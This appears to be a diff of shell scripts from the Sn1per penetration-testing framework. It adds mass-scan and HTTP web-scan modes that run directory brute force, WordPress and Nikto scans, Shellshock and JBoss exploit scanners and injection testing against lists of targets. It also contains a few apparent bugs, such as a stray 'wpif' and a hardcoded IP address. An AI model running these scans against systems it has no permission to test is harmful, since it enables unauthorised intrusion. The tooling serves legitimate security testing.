echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi

74
modes/massvulnscan.sh Normal file
View File

@@ -0,0 +1,74 @@
# MASSWEB MODE #####################################################################################################
if [[ "$MODE" = "massvulnscan" ]]; then
if [[ -z "$FILE" ]]; then
logo
echo "You need to specify a list of targets (ie. -f <targets.txt>) to scan."
exit
fi
if [[ "$REPORT" = "1" ]]; then
for a in `cat $FILE`;
do
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
mkdir $WORKSPACE_DIR/domains 2> /dev/null
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
mkdir $WORKSPACE_DIR/nmap 2> /dev/null
mkdir $WORKSPACE_DIR/notes 2> /dev/null
mkdir $WORKSPACE_DIR/reports 2> /dev/null
mkdir $WORKSPACE_DIR/output 2> /dev/null
fi
args="$args -m vulnscan --noreport --noloot"
TARGET="$a"
args="$args -t $TARGET"
echo -e "$OKRED |"
echo -e "$OKRED | |"
echo -e "$OKRED | -/_\-"
echo -e "$OKRED -/_\- ______________(/ . \)______________"
echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
echo -e "$OKRED <> \___/ <> <>"
echo -e "$OKRED "
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED || BIG"
echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED __________________________________________________________"
echo -e "$RESET"
if [[ ! -z "$WORKSPACE_DIR" ]]; then
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
else
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
fi
args=""
done
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi

73
modes/massweb.sh Normal file
View File

@@ -0,0 +1,73 @@
# MASSWEB MODE #####################################################################################################
if [[ "$MODE" = "massweb" ]]; then
if [[ -z "$FILE" ]]; then
logo
echo "You need to specify a list of targets (ie. -f <targets.txt>) to scan."
exit
fi
if [[ "$REPORT" = "1" ]]; then
for a in `cat $FILE`;
do
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
mkdir $WORKSPACE_DIR/domains 2> /dev/null
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
mkdir $WORKSPACE_DIR/nmap 2> /dev/null
mkdir $WORKSPACE_DIR/notes 2> /dev/null
mkdir $WORKSPACE_DIR/reports 2> /dev/null
mkdir $WORKSPACE_DIR/output 2> /dev/null
fi
args="$args -m web --noreport --noloot"
TARGET="$a"
args="$args -t $TARGET"
echo -e "$OKRED |"
echo -e "$OKRED | |"
echo -e "$OKRED | -/_\-"
echo -e "$OKRED -/_\- ______________(/ . \)______________"
echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
echo -e "$OKRED <> \___/ <> <>"
echo -e "$OKRED "
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED || BIG"
echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED __________________________________________________________"
echo -e "$RESET"
if [[ ! -z "$WORKSPACE_DIR" ]]; then
#echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
else
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
fi
args=""
done
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi

53
modes/masswebscan.sh Normal file
View File

@@ -0,0 +1,53 @@
# MASSWEB MODE #####################################################################################################
if [[ "$MODE" = "masswebscan" ]]; then
if [[ -z "$FILE" ]]; then
logo
echo "You need to specify a list of targets (ie. -f <targets.txt>) to scan."
exit
fi
if [[ "$REPORT" = "1" ]]; then
for a in `cat $FILE`;
do
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
mkdir $WORKSPACE_DIR/domains 2> /dev/null
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
mkdir $WORKSPACE_DIR/nmap 2> /dev/null
mkdir $WORKSPACE_DIR/notes 2> /dev/null
mkdir $WORKSPACE_DIR/reports 2> /dev/null
mkdir $WORKSPACE_DIR/output 2> /dev/null
mkdir $WORKSPACE_DIR/vulnerabilities/ 2> /dev/null
mkdir $WORKSPACE_DIR/scans/ 2> /dev/null
fi
args="$args -m webscan --noreport --noloot"
TARGET="$a"
args="$args -t $TARGET"
if [[ ! -z "$WORKSPACE_DIR" ]]; then
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
else
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
fi
args=""
done
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi

1259
modes/normal.sh Normal file
View File

File diff suppressed because it is too large Load Diff

200
modes/normal_webporthttp.sh Normal file
View File

@@ -0,0 +1,200 @@
wpif [[ "$MODE" = "web" ]]; then
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$PASSIVE_SPIDER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2022-33-index?url=*.$TARGET&output=json" -H 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36' 2> /dev/null | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$WAYBACKMACHINE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$HACKERTARGET" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s GET "https://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid|error getting links" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$GAU" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING GUA URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
gau -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$BLACKWIDOW" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
blackwidow -u http://$TARGET:80 -l 3 -v n
cp -f /usr/share/blackwidow/"$TARGET"_80/"$TARGET"_80-*.txt $LOOT_DIR/web/ 2>/dev/null
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
fi
fi
if [[ "$INJECTX" == "1" ]]; then
rm -f $LOOT_DIR/web/injectx-$TARGET-http.raw 2> /dev/null
#cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'http\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt
for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "http\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "http\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.raw; done; done;
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-http.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-http.txt
fi
source $INSTALL_DIR/modes/static-grep-search.sh
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
source $INSTALL_DIR/modes/javascript-analysis.sh
fi
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
if [[ "$WEB_BRUTE_COMMONSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e $WEB_BRUTE_EXTENSIONS -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u http://$TARGET -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-common.txt
fi
fi
if [[ "$WEB_BRUTE_FULLSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u http://$TARGET -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-full.txt
fi
fi
if [[ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-https-exploits.txt
fi
fi
if [[ "$DIRSEARCH" == "1" ]]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
fi
fi
if [[ "$GOBUSTER" == "1" ]]; then
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
if [[ "$CLUSTERD" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
clusterd -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http.txt
fi
if [[ "$CMSMAP" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cmsmap http://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpa.txt
echo ""
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpb.txt
echo ""
fi
if [[ "$WPSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$WP_API_KEY" ]]; then
wpscan --url http://$TARGET --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port80a.raw
echo ""
wpscan --url http://$TARGET/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port80b.raw
echo ""
else
wpscan --url http://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port80a.raw
echo ""
wpscan --url http://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port80b.raw
echo ""
fi
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port80a.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port80a.txt
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port80b.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port80b.txt
rm -f $LOOT_DIR/web/wpscan-$TARGET-http*.raw 2> /dev/null
fi
if [[ "$NIKTO" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http-port80.txt
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port80.txt
fi
if [[ "$SHOCKER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80 | tee $LOOT_DIR/web/shocker-$TARGET-port80.txt
fi
if [[ "$JEXBOSS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd /tmp/
python3 /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port80.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port80.raw > $LOOT_DIR/web/jexboss-$TARGET-port80.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port80.raw 2> /dev/null
cd $INSTALL_DIR
fi
if [[ "$SMUGGLER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u http://$TARGET | tee $LOOT_DIR/web/smuggler-$TARGET-port80.txt
fi
if [[ "$NUCLEI" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NUCLEI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target http://$TARGET -o $LOOT_DIR/web/nuclei-http-10.0.0.19-port80.txt
fi
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
